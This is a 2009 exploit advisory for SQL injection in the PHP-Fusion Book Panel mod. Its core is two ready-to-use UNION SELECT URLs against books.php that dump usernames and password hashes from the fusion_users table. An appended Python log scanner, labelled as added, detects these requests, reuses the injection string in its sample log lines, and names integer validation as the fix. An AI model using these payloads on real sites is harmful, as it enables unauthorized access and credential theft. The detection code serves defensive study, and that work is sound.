# Title : PHP-Fusion Mod Book Panel (bookid) SQL Injection Vulnerability
# Published : 2009-03-09
# Author : elusiven


/+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                                                                                       +
+  |----------------------------------------------------------------|                                                   +
+  | PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability |                                                   +
+  |----------------------------------------------------------------|                                                   +
+                                                                                                                       +
+   [-] ...Something I do out of pure passion, something I like and am fascinated by :-)                                +
+                                                                                                                       +
+  |--------------------------------|                                                                                   +
+  | Author: elusiven from Poland ! |                                                                                   +
+  | Contact: elusivenpl@gmail.com  |                                                                                   +
+  | Greetings: Fusi0n Group        |                                                                                   +
+  |--------------------------------|                                                                                   +
+                                                                                                                       +
+   Exploit:                                                                                                            +
+                                                                                                                       +
+   http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_name,4,5,6+from+fusion_users--         +
+   http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_password,4,5,6+from+fusion_users--     +
+                                                                                                                       +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++/

/join #wyjadacze on irc.quakenet.org

# www.Syue.com [2009-03-09]
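
Added example (not part of the original advisory and not PHP-Fusion code): a log check that flags requests to book_panel/books.php whose bookid is not a plain integer, which covers both URLs listed above. It assumes combined-format access logs and that legitimate bookid values are numeric; the sample log lines and the /site path prefix are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request target inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_TOKENS = re.compile(r"\b(?:union|select|from)\b|--", re.IGNORECASE)
NUMERIC_ID = re.compile(r"[0-9]{1,10}")  # assumption: bookid is a plain integer id

def check_line(line):
    """Return (value, reason) for a suspicious books.php request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/book_panel/books.php"):
        return None
    # parse_qs percent-decodes, maps '+' to a space and skips the empty pair
    # produced by the "?&bookid=" form used in the advisory's URLs.
    for value in parse_qs(url.query, keep_blank_values=True).get("bookid", []):
        if NUMERIC_ID.fullmatch(value):
            continue
        reason = "sql-keywords" if SQL_TOKENS.search(value) else "non-numeric"
        return value, reason
    return None

def scan(lines):
    """Return [(line_number, value, reason)] for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = check_line(line)
        if result:
            hits.append((n, *result))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up path prefix).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Mar/2009:10:00:01 +0000] "GET /site/book_panel/books.php?bookid=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Mar/2009:10:00:05 +0000] "GET /site/book_panel/books.php?&bookid=-1+union+select+1,2,user_name,4,5,6+from+fusion_users-- HTTP/1.1" 200 4876',
    '192.0.2.10 - - [09/Mar/2009:10:00:09 +0000] "GET /site/book_panel/books.php?bookid=abc HTTP/1.1" 200 312',
    '192.0.2.11 - - [09/Mar/2009:10:00:12 +0000] "GET /site/news.php?bookid=abc HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule, enforced in books.php before the value reaches the query, is the corresponding fix on the application side.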